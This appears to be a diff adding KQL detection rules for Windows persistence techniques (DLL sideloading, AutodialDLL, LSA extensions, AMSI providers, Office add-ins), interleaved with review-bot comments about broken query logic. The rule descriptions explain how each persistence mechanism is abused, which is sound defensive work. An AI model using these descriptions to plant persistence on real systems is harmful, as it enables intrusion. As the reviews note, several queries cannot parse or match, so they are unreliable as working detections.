b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql 
@@ -0,0 +1,10 @@
+// Title: Potential Iviewers.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-21
+// Level: high
+// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql
new file mode 100644
index 00000000..c9a9cef3
--- /dev/null
+++ b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mfdetours.DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
new file mode 100644
index 00000000..a3b0ff5c
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Attempt Via ErrorHandler.Cmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: medium
+// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
+The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
+| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql
new file mode 100644
index 00000000..6b5a2e4b
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via AutodialDLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql
new file mode 100644
index 00000000..3ea63ef9
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql
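Review bot: The second line of the ErrorHandler.cmd description, `+The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever …`, is written without the `//` prefix, so the file is not a valid KQL query — that sentence sits in the query text and will fail to parse before `DeviceFileEvents` is ever reached. Every continuation line of a multi-line description needs the comment prefix, e.g. `// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.`; the same pattern appears in other rules in this patch whose description spans several lines, so this is presumably a header-writer defect in the conversion script rather than a one-off. Separately, `DeviceFileEvents` with no `ActionType` filter also returns modify, rename and delete rows, while the description only intends creation; `| where ActionType == "FileCreated" and FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"` matches the stated scope.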
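Review bot: `RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"` will not match in DeviceRegistryEvents: AutodialDLL is a registry value under the Parameters key (the description's "key" wording is inaccurate), and this table reports value names in `RegistryValueName`, never as a suffix of `RegistryKey`. As written the rule is silent on exactly the write it exists to catch. Use `| where RegistryKey endswith "\\Services\\WinSock2\\Parameters" and RegistryValueName =~ "AutodialDLL"`, optionally with `ActionType == "RegistryValueSet"`, and fix the description to say "value".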
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via CHM Helper DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql
new file mode 100644
index 00000000..02f63428
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql
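Review bot: Both predicates look for `\\HtmlHelp Author\\Location` at the end of `RegistryKey`, but in this technique `Location` is the value written under the `HtmlHelp Author` key (it holds the DLL path), and DeviceRegistryEvents carries value names in `RegistryValueName`, so the query should never return the event it is meant to catch. Rewrite as `| where (RegistryKey endswith "\\Software\\Microsoft\\HtmlHelp Author" or RegistryKey endswith "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author") and RegistryValueName =~ "Location"`. The combined key-plus-value path is the Sysmon/Sigma `TargetObject` convention, which is the likely source of this mismatch; worth confirming with one test write before merging.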
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Custom Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-30
+// Level: medium
+// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
+
+DeviceRegistryEvents
+| where (RegistryValueData startswith "URL:" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
new file mode 100644
index 00000000..e8da8e44
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
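Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*"` is a case-insensitive equality test against a string that contains a literal asterisk, so it never matches and the rule is dead. The trailing `*` is a leftover Sigma wildcard; the intended prefix match is `RegistryKey startswith "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\"` — I believe MDE reports HKCR writes under HKLM\SOFTWARE\Classes (or the user hive) rather than a `CLASSES` root, so check a sample event for the exact rendering. Since the `URL:` marker is stored in the protocol key's default value, adding a `RegistryValueName == ""` (or `=~ "(Default)"`, whichever the table uses) condition would also cut noise from other values written under the same key.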
@@ -0,0 +1,18 @@
+// Title: Potential Persistence Via Disk Cleanup Handler - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
+The disk cleanup manager is part of the operating system. It displays the dialog box […]
+The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate new entry added by windows
+
+DeviceRegistryEvents
+| where (ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql
new file mode 100644
index 00000000..5ab794a6
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via DLLPathOverride
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language*" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
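Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*"` keeps the Sigma wildcard as a literal `*`, so no real key name satisfies it and the Disk Cleanup rule can never fire. The handler is registered as a subkey under VolumeCaches, which the long `endswith` exclusion list already assumes, so the match should be `RegistryKey contains "\\Explorer\\VolumeCaches\\"`. The five description continuation lines beginning at `+The disk cleanup manager is part of the operating system.` are also emitted without `//`, which makes the file unparseable as KQL; each needs a `// ` prefix.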
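Review bot: The DLLPathOverride `where` clause cannot match anything: `RegistryKey endswith "\\...\\ContentIndex\\Language*"` compares against a literal asterisk, and `StemmerDLLPathOverride`, `WBDLLPathOverride`, `StemmerClass` and `WBreakerClass` are value names (the description itself calls DLLPathOverride a value) that DeviceRegistryEvents reports in `RegistryValueName`, not inside `RegistryKey`. Suggested rewrite: `| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\" and RegistryValueName in~ ("StemmerDLLPathOverride", "WBDLLPathOverride", "StemmerClass", "WBreakerClass")`. Adding `ActionType == "RegistryValueSet"` would keep key-deletion events during cleanup from alerting.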
diff --git a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql
new file mode 100644
index 00000000..9bf56e81
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Event Viewer Events.asp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql
new file mode 100644
index 00000000..16167834
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql
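Review bot: `MicrosoftRedirectionProgram`, `MicrosoftRedirectionURL` and `MicrosoftRedirectionProgramCommandLineParameters` are values under the `Event Viewer` key, not subkeys, so `RegistryKey contains "...\\Event Viewer\\MicrosoftRedirectionProgram"` will not match any DeviceRegistryEvents row; match the key and move the names to `RegistryValueName`, e.g. `RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer" and RegistryValueName in~ ("MicrosoftRedirectionProgram", "MicrosoftRedirectionURL")`, with the same change in the two `RegistryKey endswith` filter branches. The exclusion value `"-url hcp://services/centers/support*topic=%%s"` also still carries a Sigma `*` wildcard inside a `=~` equality, so that branch never applies; `RegistryValueData startswith "-url hcp://services/centers/support"` is the equivalent. `InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe"` works only because the full path ends with itself and reads more honestly as `=~`.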
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Excel Add-in - Registry
+// Author: frack113
+// Date: 2023-01-15
+// Level: high
+// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
new file mode 100644
index 00000000..dab9596b
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via LSA Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
+The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql
new file mode 100644
index 00000000..52afb24c
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql
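Review bot: The two `endswith` tests on `RegistryKey` in the Excel add-in rule (`"Software\\Microsoft\\Office*"` and `"\\Excel\\Options"`) are mutually exclusive — a string has only one suffix, and the first one additionally contains a literal `*` — so the query returns nothing. The first condition was meant as a substring match: `RegistryKey contains "\\Software\\Microsoft\\Office\\" and RegistryKey endswith "\\Excel\\Options"`. Because the `/R …xll` data is written to an `OPEN`/`OPENn` value under Options, `RegistryValueName startswith "OPEN"` would pin the match further; the data filters (`startswith "/R "`, `endswith ".xll"`) are fine as they are.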
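Review bot: The LSA Extensions description says `Extensions` is a REG_MULTI_SZ *value*, yet the query looks for it at the end of `RegistryKey` (`RegistryKey contains "...\\LsaExtensionConfig\\LsaSrv\\Extensions"`); DeviceRegistryEvents carries value names in `RegistryValueName`, so the modification this rule exists for will not match. Use `| where RegistryKey endswith "\\Control\\LsaExtensionConfig\\LsaSrv" and RegistryValueName =~ "Extensions"`. The continuation line `+The "Extensions" list contains filenames of DLLs …` is also missing its `//` prefix and will stop the file from parsing as a query.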
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Microsoft Office Add-In
+// Author: NVISO
+// Date: 2020-05-11
+// Level: high
+// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+// False Positives:
+// - Legitimate add-ins
+
+DeviceFileEvents
+| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql
new file mode 100644
index 00000000..5313eb2b
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql
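Review bot: The third branch, `FolderPath contains "Microsoft\\Excel\\XLSTART\\"`, lacks the leading backslash that the other three path fragments carry, so it alone also matches any directory whose name merely ends in `Microsoft`; harmless in practice but inconsistent, and `"\\Microsoft\\Excel\\XLSTART\\"` is what was evidently intended. Since the rule is about add-ins being placed, a `DeviceFileEvents` query without `ActionType == "FileCreated"` will also raise on deletion and modification of the same files, which doubles the alert volume for no detection gain.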
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Microsoft Office Startup Folder
+// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Loading a user environment from a backup or a domain controller
+// - Synchronization of templates
+
+DeviceFileEvents
+| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql
new file mode 100644
index 00000000..0674aea0
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql
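Review bot: The description promises detection of file *creation*, but `DeviceFileEvents` with no `ActionType` filter also returns FileModified, FileRenamed and FileDeleted rows for these paths, so template syncs and cleanups (the documented FPs) will alert just as loudly as a malicious drop; add `ActionType in ("FileCreated", "FileRenamed")` ahead of the path tests, rename included because installers commonly place files that way. The WINWORD/EXCEL exclusion checks only the image name (`InitiatingProcessFolderPath endswith "\\WINWORD.exe"`), so any binary renamed to WINWORD.exe bypasses the rule; anchor it to the install root as well, e.g. `InitiatingProcessFolderPath startswith "C:\\Program Files" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"` (KQL `endswith` is case-insensitive, so the mixed casing is not the problem).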
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Mpnotify
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql
new file mode 100644
index 00000000..c7ae5b66
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via MyComputer Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: high
+// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
new file mode 100644
index 00000000..c225fb44
--- /dev/null
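Review bot: The mpnotify description and false-positive note both talk about registering a "SIP provider", but the query watches `Winlogon\\mpnotify`, so the documentation does not describe what the rule detects and an analyst will be sent down the wrong path; replace it with something like `// Description: Detects modification of the Winlogon "mpnotify" value, which names the notification program Winlogon launches during logon and can be abused for persistence`. Since mpnotify is a value rather than a subkey, `RegistryKey contains "...\\Winlogon\\mpnotify"` will also not match in DeviceRegistryEvents; use `RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" and RegistryValueName =~ "mpnotify"`.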
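Review bot: `RegistryKey endswith "(Default)"` in the MyComputer rule follows the Sysmon convention of appending the value name to the key path; in DeviceRegistryEvents the key and value name are separate columns, so this suffix test is very unlikely ever to match. Match the default value through `RegistryValueName` instead — `| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and (RegistryValueName == "" or RegistryValueName =~ "(Default)")` — and confirm against one sample `RegistryValueSet` event which rendering your tenant produces. The description also points to a "reference section" that this file format does not carry; drop the parenthetical or add a `// References:` line.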
+++ b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via New AMSI Providers - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate security products adding their own AMSI providers. Filter these according to your environment
+
+DeviceRegistryEvents
+| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql
new file mode 100644
index 00000000..5165e101
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql
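Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*"` (and its WOW6432Node twin) keep the Sigma trailing wildcard as a literal `*`, so no `RegistryKeyCreated` event can satisfy them and the rule is effectively disabled. Provider registration creates a CLSID subkey beneath Providers, so the substring form is what is wanted: `RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers\\" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers\\"`. Note that the Program Files exclusion is path-based only; a provider dropped by an installer running from a user-writable Program Files subfolder would be silently allowed, which is acceptable for the stated FP profile but worth a comment.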
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Notepad++ Plugins
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Possible FPs during first installation of Notepad++
+// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
+
+DeviceFileEvents
+| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith ".exe" and (FolderPath in~ ("C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll", "C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll", "C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll", "C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll"))))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql
new file mode 100644
index 00000000..13afbc05
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql
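Review bot: The middle exclusion allow-lists any process named `target.exe` (or ending in `Installer.x64.exe`) running from `C:\\Users\\…\\AppData\\Local\\Temp\\`, which is exactly the user-writable staging directory a dropper would use, so an attacker who names their loader target.exe bypasses the rule silently. If the exclusion exists for the Notepad++ installer, tie it to the installer's naming the way the third branch already does — `InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith "Installer.x64.exe"` — and document in the False Positives block which product writes `target.exe`, or drop that name. The description speaks of creation of new DLLs, so `ActionType == "FileCreated"` belongs in the `where` as well; without it plugin deletions alert too.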
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Outlook Form
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-10
+// Level: high
+// Description: Detects the creation of a new Outlook form which can contain malicious code
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.003
+// False Positives:
+// - Legitimate use of outlook forms
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql
new file mode 100644
index 00000000..b561b52f
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via TypedPaths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
